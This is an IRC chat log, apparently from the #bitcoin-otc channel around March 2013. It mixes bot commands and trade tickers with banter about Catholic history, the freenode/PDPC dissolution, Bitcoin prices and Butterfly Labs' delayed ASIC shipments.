say everything after 200AD is built on lies and fraud Mar 21 05:13:10 ;;everify freenode:#bitcoin-otc:784991315e879c5e141fbfc3d3c15b7be6d7bb814adb9b75d248b223 Mar 21 05:13:11 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Mar 21 05:13:19 ;;rate jesus -1 there's that entire mess in the temple to sort out. Mar 21 05:13:20 Error: User doesn't exist in the Rating or GPG databases. User must be GPG-registered to receive ratings. Mar 21 05:13:20 smickles: not particularly. Mar 21 05:13:33 pfff Mar 21 05:13:43 Luke-Jr: you don't like political thrillers, do you? Mar 21 05:14:05 smickles: I'm betting you ignored what led up to the bad popes? Mar 21 05:14:15 protestants ? Mar 21 05:14:19 Luke-Jr, what is the current BFL asic status, I haven't been keeping up? Mar 21 05:14:21 here's a hint: bad laymen Mar 21 05:14:32 mircea_popescu: most of them were pre-protestantism Mar 21 05:14:44 what about the last 4 ? Mar 21 05:15:18 mircea_popescu: St. Pius X - Pius XII? Mar 21 05:15:35 no, this current argentinian guy, ratz, jp2 and Mar 21 05:15:42 who was before, paul ? Mar 21 05:15:43 those are frauds, not popes Mar 21 05:15:49 ok. so what led to them ? Mar 21 05:16:01 neglegent laity and clergy Mar 21 05:16:12 Pope Pius XII allowed modernism to flourish, more or less Mar 21 05:16:36 [BTCTC] [GSDPT] 1 @ 0.00438 BTC [-] Mar 21 05:16:44 "oh god what a horrible thing" comes to mind Mar 21 05:16:54 mircea_popescu: the catholic church was not started by peter Mar 21 05:17:18 the Catholic Church was started by Jesus Mar 21 05:17:21 not like he had much of a choice. Mar 21 05:17:22 rate jesus -1 there's that entire mess in the temple to sort out. << HAHA Mar 21 05:17:31 mircea_popescu: of course he did Mar 21 05:17:38 erp. missed his nick. :/ Mar 21 05:18:12 even if the civil powers neglected their duties, Pope Pius XII could have proactively issued written excommunications against all modernists identified Mar 21 05:18:18 lol ok. Mar 21 05:18:21 and ? Mar 21 05:18:23 instead of basically ignoring them taking over the seminaries and such Mar 21 05:18:38 Brian started the church Mar 21 05:18:41 modernisms like euthanasia, gay marriage, abortions and female bishops ? Mar 21 05:18:46 always look on the bright side of life Mar 21 05:18:51 Troic: no Mar 21 05:19:03 Troic: he means speaking english Mar 21 05:19:05 jesus did not start the catholic church, that was paul? wtf? Mar 21 05:19:05 didn't pius xii get the reichskonkordat going ? Mar 21 05:19:09 modernism is the heresy that truth/doctrine can change over time, basically Mar 21 05:19:15 Chaang-Noi: it was Jesus Mar 21 05:19:19 lol Mar 21 05:19:24 saul was a plant Mar 21 05:19:26 read the bible and world history Mar 21 05:19:57 jesus had nothing like a church... Mar 21 05:20:12 Chaang-Noi: He founded a Church and that was the only thing He left mankind with for guidance Mar 21 05:20:15 the roman sual/paul did it Mar 21 05:20:32 it started 30 to 40 eyars after he died Mar 21 05:20:38 nope Mar 21 05:21:00 ? the catholic church was around before sual/paul was a christian? Mar 21 05:21:03 i dont think Luke-Jr is going to convert to litecoin Chaang-Noi Mar 21 05:21:09 lol Mar 21 05:21:15 Luke has 1337 ltc:) Mar 21 05:21:16 after His resurrection, he appointed St. Peter to be the first pope; shortly after His ascension, He sent the Holy Ghost to consecrate His first bishops Mar 21 05:21:18 [MPEX] [S.MPOE] 16450 @ 0.00071031 = 11.6846 BTC [+] Mar 21 05:21:22 no but srsly. pius xii ? nazi germany ? anything there ? Mar 21 05:21:26 Chaang-Noi: yes Mar 21 05:21:46 mircea_popescu: what about it? the pope did much to save many jews from persecution Mar 21 05:21:49 i was just telling pigeons :) Mar 21 05:21:55 but.he.signed.with.the.devil. Mar 21 05:21:57 that i already converted you:) Mar 21 05:21:57 Luke-Jr: do you believe that jesus gave that one saint his foreskin as a wedding ring? Mar 21 05:22:08 smickles: wtf Mar 21 05:22:13 i dont have enough info Mar 21 05:22:15 smickles: I have no idea what nonsense you are talking about Mar 21 05:22:25 or that jesus left his foreskin on saturn as the rings Mar 21 05:22:25 anyway, there is no use debating this stuff. Mar 21 05:22:37 LOUD NOISES! Mar 21 05:22:49 jesus gave the saint jesus' foreskin or jesus gave the saint the saint's own foreskin? Mar 21 05:22:52 mod6: more interesting than sitting around notihnging Mar 21 05:23:02 jesus was a jew, he saved and preserved his foreskin that long? Mar 21 05:23:04 if you guys want some lulz you shouldread about the mormans Mar 21 05:23:05 boys, i am proud to announce i have the first ever intelligent pumpkin ready to show everyone Mar 21 05:23:14 some of thei rstuff is fucking insane, it is really a good read Mar 21 05:23:15 :O Mar 21 05:23:15 if things go about as planned should be early to mid next week Mar 21 05:23:22 Chaang-Noi: mormonism is an extremely insane false religion Mar 21 05:23:26 hi copumpkin :) Mar 21 05:23:39 copumpkin is intelligent? Mar 21 05:23:44 luke yeah, it is so insane it is fun reading their texts Mar 21 05:23:44 he's a pineapple. Mar 21 05:23:52 yep Mar 21 05:23:59 I just pretend to be a pumpkin Mar 21 05:24:00 Chaang-Noi: I try to avoid reading demon-dictated texts Mar 21 05:24:03 Luke-Jr: saint catherine of sienna, i think Mar 21 05:24:06 btw copumpkin have you heard ? Mar 21 05:24:12 probably not Mar 21 05:24:14 smickles: what about her? Mar 21 05:24:15 never around anymore :P Mar 21 05:24:16 your poisonous donation caused pdpc to be audited by the tax office Mar 21 05:24:23 they got dissolved, everyone hauled off to jail Mar 21 05:24:23 seriously? Mar 21 05:24:25 all your fault. Mar 21 05:24:25 yup Mar 21 05:24:27 lol Mar 21 05:24:33 luke jr is bitcoin a sign of the end of the world? where everyone must you a truly world currancy? is the the begining of the end? Mar 21 05:24:48 Chaang-Noi: where do you get this nonsense from? Mar 21 05:24:51 luke demons can be very entertaining Mar 21 05:24:52 you can't buy or sell without the number of your private key Mar 21 05:24:57 revalations Mar 21 05:25:03 copumpkin http://blog.freenode.net/2013/03/bye-bye-pdpc/ Mar 21 05:25:05 Luke-Jr: she's the one who jesus married by giving her his foreskin (in her mouth) Mar 21 05:25:09 mircea_popescu: just reading now! Mar 21 05:25:11 crazy Mar 21 05:25:11 you should get your head checked out if you're getting revelations Mar 21 05:25:12 however linking it to btc is a streach Mar 21 05:25:13 now I feel bad Mar 21 05:25:18 totally should. Mar 21 05:25:19 smickles: shoo troll Mar 21 05:25:29 Chaang-Noi actaully has a point... and many people take the bible literally. Mar 21 05:25:38 Luke-Jr: well, what's the real story of that then? Mar 21 05:25:48 they talk about some sort of one world currency and some trumpeting angels and stuff. Mar 21 05:25:48 smickles: um, there is no story like that Mar 21 05:25:51 quite amusing. Mar 21 05:25:54 they cut off her hand after her death to preserve it Mar 21 05:25:57 it's a relic now Mar 21 05:26:09 smickles does it still perform ? Mar 21 05:26:10 mod6 revalations is a damn good read to Mar 21 05:26:18 <[\\\]> dust-otc! Mar 21 05:26:20 ;;google holy prepuce Mar 21 05:26:21 Holy Prepuce - Wikipedia, the free encyclopedia: ; The Holy Foreskin of Jesus - YouTube: ; Holy Foreskin! A Brief History of Stolen Catholic Relics | Mental Floss: Mar 21 05:26:23 <[\\\]> who is pdpc? Mar 21 05:26:28 http://en.wikipedia.org/wiki/Catherine_of_Siena Mar 21 05:26:36 [\\\]: the group that runs freenode Mar 21 05:26:41 [\\\] porn studio, does bestiality and sutff. Mar 21 05:26:44 you wouldn't know. Mar 21 05:26:48 <[\\\]> nope Mar 21 05:26:49 [\\\]: peer directed projects center, former org running freenode till they took mircea_popescu 's money and ran Mar 21 05:27:06 <[\\\]> haha Mar 21 05:27:08 <[\\\]> classic Mar 21 05:27:09 they didn't run, they just inserted it Mar 21 05:27:16 smickles: what about it? Mar 21 05:27:27 <[\\\]> "You've reached freenode, a service of Peer-Directed Projects Center (PDPC). freenode provides discussion facilities for the Free and Open Source Software communities, for not-for-profit organizations and for related communities and organizations." Mar 21 05:27:32 <[\\\]> they haven't updated their website Mar 21 05:27:34 <[\\\]> trolls Mar 21 05:27:47 [\\\] volunteer time. they'll get around to it Mar 21 05:27:58 about five weeks after someone in "bitcoin devteam" tests something. Mar 21 05:28:00 Luke-Jr: you're saying that she didn't receive the forskin of jesus? Mar 21 05:28:02 <[\\\]> where can I see an article about all of this Mar 21 05:28:10 it's part of why she's a saint? Mar 21 05:28:12 smickles: I've never heard of anything of the sort Mar 21 05:28:13 [\\\] in the above line to copumpkin Mar 21 05:28:27 i heard of the foreskin before Mar 21 05:28:28 http://en.wikipedia.org/wiki/Circumcision_of_Jesus Mar 21 05:28:31 smickles: apparently neither has wikipedia Mar 21 05:28:43 smickles this is why he doesn't support modernism : so much new stuff just from not having read it before... Mar 21 05:28:50 wiki is almost as stupid as bible didnt ya know Mar 21 05:28:56 shit smickles i thought you were making up the rings of staturn bit Mar 21 05:29:09 mircea_popescu: i've got a picture of it Mar 21 05:29:13 http://upload.wikimedia.org/wikipedia/commons/b/bc/Barna_da_Siena._Mystic_Marriage_of_st_Catherine._Boston_MFA.jpg Mar 21 05:29:36 why is he carrying a book ? Mar 21 05:29:36 hahaha if thats not enough they have http://en.wikipedia.org/wiki/Holy_Umbilical_Cord Mar 21 05:29:42 Luke-Jr: apparently you can't read wikipedia all that well Mar 21 05:29:47 you know it's so damned unlikely jesus ever touched a tome... too expensive. Mar 21 05:29:52 [HAVELOCK] [SDICE] 1 @ 0.47198999 BTC [-] Mar 21 05:30:47 <[\\\]> mircea_popescu: they didn't have kindles? Mar 21 05:30:55 can we talk more about jesus? Mar 21 05:30:59 smickles: I searched the page for 'foreskin' Mar 21 05:31:14 <[\\\]> ThickAsThieves: sure, he's still cutting my grass outside Mar 21 05:31:19 [\\\] only the harlots and modernists had kindles back then Mar 21 05:31:28 okay new topic muhammad the true profit Mar 21 05:31:41 chaang-noe can sepl Mar 21 05:31:42 <[\\\]> shutup Goat, we're still on jesus Mar 21 05:31:57 no one fucks with da jesus Mar 21 05:31:58 what would jesus think about bitcoin Mar 21 05:31:58 <[\\\]> so jesus, a goat, and a jew walk into a bar, right Mar 21 05:32:08 9 year olds dude Mar 21 05:32:14 ahahaha Mar 21 05:32:15 jesus would probly be an altcoiner Mar 21 05:32:15 s/9/8/ Mar 21 05:32:22 ThickAsThieves: nonsense Mar 21 05:32:25 I like Jesus Mar 21 05:32:34 I am a born again Christian Mar 21 05:32:38 wtf Mar 21 05:32:43 <[\\\]> what were you born the first time? Mar 21 05:32:44 what is going on in the world Mar 21 05:32:48 i know a guy named jesus. he's an argentine Mar 21 05:32:55 The second birth is into the family of God Mar 21 05:32:59 [\\\] he was born a goat the first time. Mar 21 05:33:00 Adam fell and became sinful Mar 21 05:33:02 [MPEX] [O.BTCUSD.C510T] 6 @ 0.1925 = 1.155 BTC [+] Mar 21 05:33:04 mod6: we're racing to $100 Mar 21 05:33:10 each creature can only reproduce according to type Mar 21 05:33:15 nOgAnOo: successful troll 7/10 Mar 21 05:33:16 therefore because of Adam we are all sinful Mar 21 05:33:17 <[\\\]> Luke-Jr: don't buy any more please Mar 21 05:33:19 http://www.thestar.com/news/2007/12/15/searching_for_christianitys_most_sensitive_remnant.html Mar 21 05:33:23 the 2nd birth can really do a number on a girl Mar 21 05:33:25 [\\\]: why not? :/ Mar 21 05:33:29 You need to be reborn into the family of God to go to heaven Mar 21 05:33:33 <[\\\]> the last time you bought, we crashed to $2 Mar 21 05:33:33 God's name is YAHWEH Mar 21 05:33:36 [\\\]: oh, buy. why would I buy? Mar 21 05:33:38 the Holy Trinity Mar 21 05:33:45 God of Israel Mar 21 05:33:47 That is my God Mar 21 05:33:48 <[\\\]> why did you buy at $25? Mar 21 05:33:51 <[\\\]> lol Mar 21 05:33:52 i hate to leave this wonderful conversation but i has gots to go to a tropical island so i can drink beer and not do much else, catch ya all later, happy trading Mar 21 05:33:54 dunno Mar 21 05:33:54 parseval pgp2 pigeons pizzaman1337 PsychoticBoy Pucilowski Mar 21 05:33:54 What are BTC at now? Mar 21 05:33:59 I've been gone a week Mar 21 05:34:01 at my cabin Mar 21 05:34:04 [\\\] because he had 5 bucks and nothing to do with it Mar 21 05:34:05 nOgAnOo: $66.6 Mar 21 05:34:10 bogus Mar 21 05:34:10 <[\\\]> ;;ticker Mar 21 05:34:10 BTCUSD ticker | Best bid: 64.49064, Best ask: 64.50000, Bid-ask spread: 0.00936, Last trade: 64.50000, 24 hour volume: 91855.74979099, 24 hour low: 57.70200, 24 hour high: 66.00000, 24 hour vwap: 62.57095 Mar 21 05:34:14 seriously the alleged foreskin of jesus was said to be stolen by a chinese relic hunter Mar 21 05:34:15 almost Mar 21 05:34:16 YOU ARE SHITTING ME Mar 21 05:34:19 I KNEW IT Mar 21 05:34:23 IT'S GOING TO 100 Mar 21 05:34:25 he came back for bitcoinica Mar 21 05:34:27 <[\\\]> /ignore nOgAnOo Mar 21 05:34:36 caps make your words more believable Mar 21 05:34:50 O RLY? Mar 21 05:35:01 <[\\\]> I think I'm going to make a script that automatically ignores people that write more than 2 lines in caps in a row Mar 21 05:35:05 NO RLY Mar 21 05:35:08 <[\\\]> NO U Mar 21 05:35:11 SRSLY! Mar 21 05:35:12 i thought the chinese relic hunter excuse was original to zhou, guess not Mar 21 05:35:16 banner time Mar 21 05:35:19 I'm out of here Mar 21 05:35:19 <[\\\]> speaking of Mar 21 05:35:31 <[\\\]> whatever happened to zhou tong and his art dealer boyfriend? Mar 21 05:35:40 WE CAN HAZ A DUOLOGUE IN CAPS AND BYPASS IMSAGUY'S SCRIPT KIDDINESS Mar 21 05:35:55 Stop, .. banner time! oh, oh, oh, oh Mar 21 05:36:00 haha Mar 21 05:36:04 this channel was so much better before bitcoin forked Mar 21 05:36:18 <[\\\]> omg, I f0rked the chain!!!11one Mar 21 05:36:34 no, that was slush Mar 21 05:36:37 BOYCOTT SLUSH Mar 21 05:36:41 This channel was better before nefario went full retard. Never go full retard. Before than, there was more interest in BTC assets. Mar 21 05:36:50 <[\\\]> lol Mar 21 05:36:51 <[\\\]> seriously Mar 21 05:36:51 this became of zhou https://www.nameterrific.com/about Mar 21 05:36:51 Namworld not rly. Mar 21 05:37:03 Namworld: ironically, the FinCEN thing suggests GLBSE was 100% legal in the US Mar 21 05:37:04 there were more poor people deluding themselves with btc assets. Mar 21 05:37:05 <[\\\]> pigeons: he was working on that during bitcoinica Mar 21 05:37:25 < Luke-Jr> Namworld: ironically, the FinCEN thing suggests GLBSE was 100% legal in the US Mar 21 05:37:37 <[\\\]> lol Mar 21 05:37:39 missed the part about unregulated securities Luke-Jr ? Mar 21 05:37:44 <[\\\]> haha Mar 21 05:37:47 smickles: maybe! Mar 21 05:37:58 <[\\\]> FinCEN != SEC Mar 21 05:38:21 [\\\]: iow, FinCEN is okay with it, but SEC would get him? Mar 21 05:38:22 oh shit better get my MSB license so i can still sell on silk road Mar 21 05:38:24 Well, fair enough mircea. I know MPEx has been doing well and is the major volume. But at least there was more regular chatting about BTC businesses and less unrelated talk. Mar 21 05:38:31 <[\\\]> lol pigeons Mar 21 05:38:38 funnay Mar 21 05:38:44 I'm not really talking about volume, just quality of talk in this channel. Mar 21 05:38:50 <[\\\]> Luke-Jr: SEC cares about securities, FinCEN is worried about money laundering Mar 21 05:38:58 [\\\]: so yes? Mar 21 05:39:00 <[\\\]> Namworld, ninja please Mar 21 05:39:01 <[\\\]> aye Mar 21 05:39:01 Namworld i kinda don't recall. Mar 21 05:39:09 <[\\\]> mircea_popescu: because you were stoned at the time Mar 21 05:39:21 <[\\\]> that was before you had to give away mpex accounts Mar 21 05:39:22 i seriously haven't been stoned in like 10 years Mar 21 05:39:31 <[\\\]> thats about the same timeline Mar 21 05:39:32 naw, glbse only died in like oct neh ? Mar 21 05:39:34 <[\\\]> in bitcoin years Mar 21 05:39:37 you're not telling me this is pre-april ? Mar 21 05:39:45 mircea: yeah Mar 21 05:39:50 pre april ?! are you kidding me ?! Mar 21 05:39:55 I can type on the keyboard too Mar 21 05:40:01 <[\\\]> I remember back when glbse didn't require ID Mar 21 05:40:03 what exactly was it, peter lambert advising re sensodyne ?! Mar 21 05:40:05 <[\\\]> smickles: Dragon? Mar 21 05:40:16 GLBSE never required ID… Mar 21 05:40:21 <[\\\]> Luke-Jr: lies. Mar 21 05:40:34 use to not need a web page for glbse Mar 21 05:40:38 i should reject all gpg sigs that don't include idpic Mar 21 05:40:49 actually... that don't include NUDE id pic. Mar 21 05:40:55 <[\\\]> mircea_popescu: idpic with b00bies* Mar 21 05:40:58 mircea_popescu: yeah, i made mpoe.etf on the old version of glbse Mar 21 05:40:59 <[\\\]> exactly Mar 21 05:41:00 too late troll :D Mar 21 05:41:00 <[\\\]> lol Mar 21 05:41:05 ok let me get usagi to send you his key Mar 21 05:41:11 <[\\\]> haha Mar 21 05:41:19 pigeons i think you're on the list of paid trolls nao. Mar 21 05:41:20 <[\\\]> I thought usagi was female, no? Mar 21 05:41:27 <[\\\]> mircea_popescu: me too! Mar 21 05:41:30 with eximo bob and who else Mar 21 05:41:34 mircea_popescu wants a pic of me nude? Mar 21 05:41:34 s/he Mar 21 05:41:41 [\\\] female yes, but not the boobs sort. Mar 21 05:41:45 who is paying me? Mar 21 05:41:45 <[\\\]> pigeons: penis, tits? Mar 21 05:41:48 hrm. Mar 21 05:41:49 [\\\]: usagi: http://www.youtube.com/user/MagicalPockyUsagi Mar 21 05:41:55 <[\\\]> mircea_popescu: I meant paid troll Mar 21 05:42:14 <[\\\]> DMC making money the old fashioned way... at the casino. Mar 21 05:42:27 [\\\]: lol Mar 21 05:42:29 ahaha wait, if he goes broke sdice gets rich Mar 21 05:42:33 the whole 2 btc! Mar 21 05:42:40 yeah whats the deal Diablo-D3, donating to shareholders of s.dice? Mar 21 05:42:41 mircea_popescu: hmm, true Mar 21 05:42:51 \o/ Mar 21 05:42:56 pigeons: not at all, they are donating ot me. Mar 21 05:43:05 you've got a system Mar 21 05:43:06 Diablo-D3: want a hack to always win SD? Mar 21 05:43:08 <[\\\]> are there bets on when satoshidice fails? Mar 21 05:43:09 wow, never heard that Mar 21 05:43:14 <[\\\]> that'd be the ultimate bet Mar 21 05:43:20 [\\\] possibly. if not you can make one Mar 21 05:43:21 <[\\\]> betting on when the house will shut down Mar 21 05:43:27 i know there was one on s.mpoe but it's not going so well Mar 21 05:43:29 Luke-Jr: besides, I would think you would want me to do God's work. Mar 21 05:43:32 there is a bet on betsofbitco on when evorhees goes to jail and one for guantanamo Mar 21 05:43:34 <[\\\]> mircea_popescu: may I make a bet that will bet on when bitbet gets shut down? Mar 21 05:43:45 sure Mar 21 05:43:47 Luke-Jr: We both worship the same God, and Jesus is our Lord and Savior. Mar 21 05:43:53 <[\\\]> Diablo-D3: lies. Mar 21 05:43:54 Diablo-D3: no Mar 21 05:43:56 will be weird tho cause if you win who pays ? Mar 21 05:44:10 Luke-Jr is a heathen =/ Mar 21 05:44:16 <[\\\]> mircea_popescu: you can be shutdown without being dissolved. Mar 21 05:44:24 nevar! Mar 21 05:44:26 how'd that work ? Mar 21 05:44:40 Diablo-D3: no u Mar 21 05:45:12 as soon as the bet is high enough [\\\] pays the gov agent bribe Mar 21 05:45:25 Luke-Jr: do you pray unceasingly? Mar 21 05:45:36 Luke-Jr is a heathen Mar 21 05:45:37 pigeons yes and ? Mar 21 05:46:04 http://bitcointroll.org/index.php?topic=141502.0 Mar 21 05:46:12 <[\\\]_m> oops Mar 21 05:46:51 <[\\\]> so is that youtube really usagi? Mar 21 05:47:01 where Mar 21 05:47:02 <[\\\]> as in the bitcoin usagi? Mar 21 05:47:08 <[\\\]> http://www.youtube.com/user/MagicalPockyUsagi Mar 21 05:47:17 <[\\\]> I'll warn you Mar 21 05:47:20 <[\\\]> you can't unsee it Mar 21 05:47:28 ok dont need to look then Mar 21 05:47:33 wait bitcointroll.org resolves!?! Mar 21 05:47:33 but i know ill get tempted later Mar 21 05:47:36 hahahahahha Mar 21 05:47:42 pigeons: you should join us up here in KC Mar 21 05:48:07 that can't be usagi, because there are no girls on the tubes Mar 21 05:48:13 jcpham always did Mar 21 05:48:17 (I'm not the only Floridian here - and the others have been here longer) Mar 21 05:48:36 yeah sounds like yall are having fu Mar 21 05:48:39 n Mar 21 05:48:45 NO F U Mar 21 05:48:48 it's a chick Mar 21 05:49:11 I see vampire music in the videos list... Mar 21 05:49:20 who do itip for bitcointroll.org Mar 21 05:49:20 jcpham: there's dramatalk.org too Mar 21 05:49:29 ! Mar 21 05:49:31 jcpham: wizkid057 setup bitcointroll.org Mar 21 05:49:31 Luke-Jr: Do you not wish to feed the hungry or heal the sick or other things good Christians would do for those in need? Mar 21 05:49:38 Sounds like usagi alright Mar 21 05:49:43 that's geat Mar 21 05:49:49 *great Mar 21 05:50:12 < [\\\]> so is that youtube really usagi? << usagi personally told me that was tehm Mar 21 05:50:15 [MPEX] [S.MPOE] 3000 @ 0.00071031 = 2.1309 BTC [+] Mar 21 05:50:36 we should just drop Florida on top of KC until BFL ships Mar 21 05:51:07 <[\\\]> we should just drop Florida on top of KC Mar 21 05:51:08 them? Mar 21 05:51:16 <[\\\]> Namworld: male/female Mar 21 05:51:17 [BTCTC] [ASICMINER-PT] 31 @ 0.9 = 27.9 BTC [-] Mar 21 05:51:20 what's the deal Luke-Jr they just rushed and had bad luck? Mar 21 05:51:21 are they shipping this month or what? Mar 21 05:51:36 ok clicking usagi luke's god help me Mar 21 05:51:55 multiple personality disorder? Mar 21 05:52:13 I notice Luke-Jr didnt answer the question Mar 21 05:52:15 we ask the HARD questions in nyeeuh Mar 21 05:52:32 <[\\\]> ok, let's discuss the following statement: Mar 21 05:52:35 <[\\\]> "new hardware for the test rig and that should get us what we need by early to mid next week." Mar 21 05:52:36 [\\\]: no Mar 21 05:52:37 <[\\\]> first up Mar 21 05:52:40 <[\\\]> 'should' Mar 21 05:52:43 <[\\\]> next up Mar 21 05:52:54 <[\\\]> 'early to mid next week' Mar 21 05:52:59 what happens next week Mar 21 05:53:06 <[\\\]> so a whole bunch of nonspecific crap Mar 21 05:53:10 jcpham: BFL comes up with their next excuse Mar 21 05:53:13 <[\\\]> jcpham: bfl can test their shit Mar 21 05:53:15 <[\\\]> or something Mar 21 05:53:28 ok since its flash i dont get to see usagi Mar 21 05:53:28 <[\\\]> you would have thought they would have tested their tester sometime in the past 4 months Mar 21 05:53:38 <[\\\]> why wait until the day you're trying to do stuff for real? Mar 21 05:54:05 so is josh actually pleasant in "real life" as alleged? Mar 21 05:54:06 Next week, we'll tell you what's gonna happen next week. Stay tuned! Mar 21 05:54:13 <[\\\]> ;;google herp derp Mar 21 05:54:14 Urban Dictionary: herp derp: ; Harp Darp / Herp Derp | Know Your Meme: ; DERP | Know Your Meme: Mar 21 05:54:16 pigeons: as long as he's not driving Mar 21 05:54:18 oh wait is this a butterfly labs story Mar 21 05:54:23 <[\\\]> holy shit, there's bfl's address Mar 21 05:54:26 let me get my popcorn Mar 21 05:54:49 they've got to be close to shipping right Mar 21 05:54:52 <[\\\]> ThickAsThieves: sometime next week, I should be able to maybe tell you something you probably don't want to hear Mar 21 05:54:56 like not many excuses left Mar 21 05:55:00 <[\\\]> jcpham: you'd think Mar 21 05:55:07 <[\\\]> next is the hurrican Mar 21 05:55:08 <[\\\]> e Mar 21 05:55:10 shit it can't be cheap to put luke up in the kc hilton for a week and pay him irc Mar 21 05:55:16 I look forward to looking forward to that, \\\ Mar 21 05:55:18 <[\\\]> and then the alligators that broke in and stole their power cords Mar 21 05:55:19 i mean unless they run out of bubble wrap and cardboard Mar 21 05:55:31 cardboard shortages could ruuin bitcoin Mar 21 05:55:31 <[\\\]> jody quit Mar 21 05:55:34 <[\\\]> it'll be a few weeks Mar 21 05:55:38 <[\\\]> we gotta hire a replacement Mar 21 05:55:46 http://www.youtube.com/watch?v=v8jJxKTFXPc Mar 21 05:55:47 [MPEX] [S.DICE] 430 @ 0.00559698 = 2.4067 BTC [-] Mar 21 05:55:47 <[\\\]> oh crap, jody didn't pay the water bill Mar 21 05:55:49 <[\\\]> two more weeks Mar 21 05:56:02 just open up preorders Mar 21 05:56:05 <[\\\]> someone clogged the toilet, see you next month Mar 21 05:56:06 lol Mar 21 05:56:07 water bill. paid Mar 21 05:56:23 <[\\\]> uh oh, the floor's a little dusty Mar 21 05:56:27 <[\\\]> we better get it inspected Mar 21 05:56:31 <[\\\]> they can't make it until June Mar 21 05:56:37 probably someone premined with the floor Mar 21 05:56:38 UL stickers Mar 21 05:56:44 don't forget UL stickers Mar 21 05:56:50 <[\\\]> FCC certification Mar 21 05:57:00 i'm seriously waiting for avalon asics to be common and then bfl buy them and slap butterfly stickers on them and ship Mar 21 05:57:04 bflcoin Mar 21 05:57:06 <[\\\]> oh god, we ran out of made in america sickers Mar 21 05:57:07 <[\\\]> stickers* Mar 21 05:57:11 should probably just email their support this caht Mar 21 05:57:17 to let them know we're wise Mar 21 05:57:23 <[\\\]> jcpham: just trying to help him out Mar 21 05:57:33 <[\\\]> why lie when you can have others do it for you? Mar 21 05:57:34 pigeons they won't be common tho. Mar 21 05:57:37 they should pay us Mar 21 05:57:50 <[\\\]> pigeons: did you see the avalon that just sold on ebay for $20k? Mar 21 05:57:54 <[\\\]> they won't be common Mar 21 05:57:56 [\\\]: they have a simple shell script they run when people demand an excsue Mar 21 05:58:03 no shit, people are nuts Mar 21 05:58:03 i did see that auction Mar 21 05:58:08 cray cray Mar 21 05:58:11 <[\\\]> Luke-Jr: you realize that you have to go in there tomorrow? Mar 21 05:58:18 lol Mar 21 05:58:19 <[\\\]> and I'm going to send them a gpgsigned copy of this log Mar 21 05:58:27 better not ;) Mar 21 05:58:32 Luke-Jr goes to BFL tomorrow? Mar 21 05:58:34 gpg signed by freenode or what Mar 21 05:58:38 <[\\\]> jcpham: he's there now Mar 21 05:58:38 I could always go downtown instead.. Mar 21 05:58:45 <[\\\]> pigeons: no, by conman Mar 21 05:58:46 oh that should be neat Mar 21 05:58:48 <[\\\]> I know he'd send it Mar 21 05:58:50 i'll gpg sign a copy of some shit i make up Mar 21 05:58:57 video luke-jr Mar 21 05:59:03 i'll drop ship a camera Mar 21 05:59:03 <[\\\]> ;;google Luke-Jr Mar 21 05:59:03 who's conman? trendon? Mar 21 05:59:04 luke-jr (Luke-Jr) · GitHub: ; User:Luke-Jr - Wikipedia, the free encyclopedia: ; Frank Luke - Wikipedia, the free encyclopedia: Mar 21 05:59:09 jcpham: why? there's nothing to see Mar 21 05:59:13 <[\\\]> pigeons: I'm rendon Mar 21 05:59:14 PROOF Mar 21 05:59:16 pigeons: a con man Mar 21 05:59:24 jcpham: proof there's nothing there? Mar 21 05:59:25 oh sonny Mar 21 05:59:35 nah, Sonnys cool Mar 21 05:59:35 be the guy luke-jr that does the thing Mar 21 05:59:51 be our bitcoin jesus Mar 21 05:59:59 crucify ver Mar 21 06:00:15 Sonny didn't want me to take his pic by the BFL sign :P Mar 21 06:00:26 turn water into bitcoins Mar 21 06:00:29 smuggle out the contraband Mar 21 06:00:34 the pics/ the video Mar 21 06:00:38 call geraldo Mar 21 06:00:44 jcpham: got that in my laptop case Mar 21 06:00:50 they called it a coaster Mar 21 06:00:51 heh Mar 21 06:01:02 precursor to the coffee warmer Mar 21 06:01:11 only $100 tho Mar 21 06:01:22 sell it to me for 500 Mar 21 06:01:26 (and doesn't mine) Mar 21 06:01:29 nm Mar 21 06:01:59 sothe vortex math crap leads to these crazy coils Mar 21 06:02:08 i got stuck on youtube for hours Mar 21 06:02:09 dennou coils? Mar 21 06:02:25 luke do you own any asicminer shares? Mar 21 06:02:39 ThickAsThieves: whatever the DMC shares count as Mar 21 06:02:47 11:1 i think Mar 21 06:02:48 rodin coil Mar 21 06:02:52 plus some more from GLBSE Mar 21 06:02:53 starship coil Mar 21 06:03:00 but not really keeping track of GLBSE crap Mar 21 06:03:05 coiledcoin Mar 21 06:03:12 http://www.youtube.com/watch?v=cKEnXcCKD-U Mar 21 06:03:17 torroids and the universe Mar 21 06:03:24 it got real trippy i had to turn it off Mar 21 06:03:54 hey, is any of SD's bitcoinds public? Mar 21 06:03:57 did you order any asics? Mar 21 06:04:06 some crazy brazilian dude is spouting crazy decimal nuclear math Mar 21 06:04:12 that leads to complex torroids Mar 21 06:04:17 and motors Mar 21 06:04:42 https://bitcointalk.org/index.php?topic=155533.msg1650422#msg1650422 Mar 21 06:04:51 so bitinstant clunked out or what Mar 21 06:05:24 HN linked to a TED talk today from 2010 Mar 21 06:05:27 http://www.youtube.com/watch?v=qgMlfz-flz8 Mar 21 06:05:33 i've been stuck on it all day Mar 21 06:05:39 jcpham: TED is pretty neat isnt it Mar 21 06:05:39 bitcoin is boring now Mar 21 06:05:43 I really should subscribe to TED Mar 21 06:05:49 like, as an RSS feed Mar 21 06:05:55 well they called it bullshit Mar 21 06:06:04 these motors and coils are not Mar 21 06:06:07 though Mar 21 06:06:09 TED is neither true or not true Mar 21 06:06:14 its meant to make you think again Mar 21 06:06:28 i've enjoyed a good many of the talks Mar 21 06:06:29 now, presumably, it really is all true Mar 21 06:06:47 even the highly theoretical stuff might be commercial in the next 20-30 years Mar 21 06:07:05 fractal antennae on cell phones a re a great example Mar 21 06:07:06 ohh now i can finally asseble my timeflux capacitor Mar 21 06:07:16 hover boards Mar 21 06:07:21 engineers were not thinking fractals in the 40's Mar 21 06:07:24 how do you tell youtube to give you html5 Mar 21 06:07:26 they should've been Mar 21 06:07:27 http://www.youtube.com/watch?v=DkGMY63FF3Q&list=SP4NL9i-Fu15hhYGB-d0hmSWD1fcIvLvn1&index=2 Mar 21 06:07:33 jcpham: yeah, but when do they start thinking with porals? Mar 21 06:07:40 kakobrekla https://bitcointalk.org/index.php?topic=120757.msg1300437#msg1300437 Mar 21 06:07:41 pigeons: youtube.com/html5 Mar 21 06:07:47 idk Diablo-D3 Mar 21 06:07:54 pigeons: not all videos are in an acceptable format yet but most are Mar 21 06:07:54 obviously bitbet absent. amusingly, i imagine it's paid a good chunk of total referals ever paid in btc Mar 21 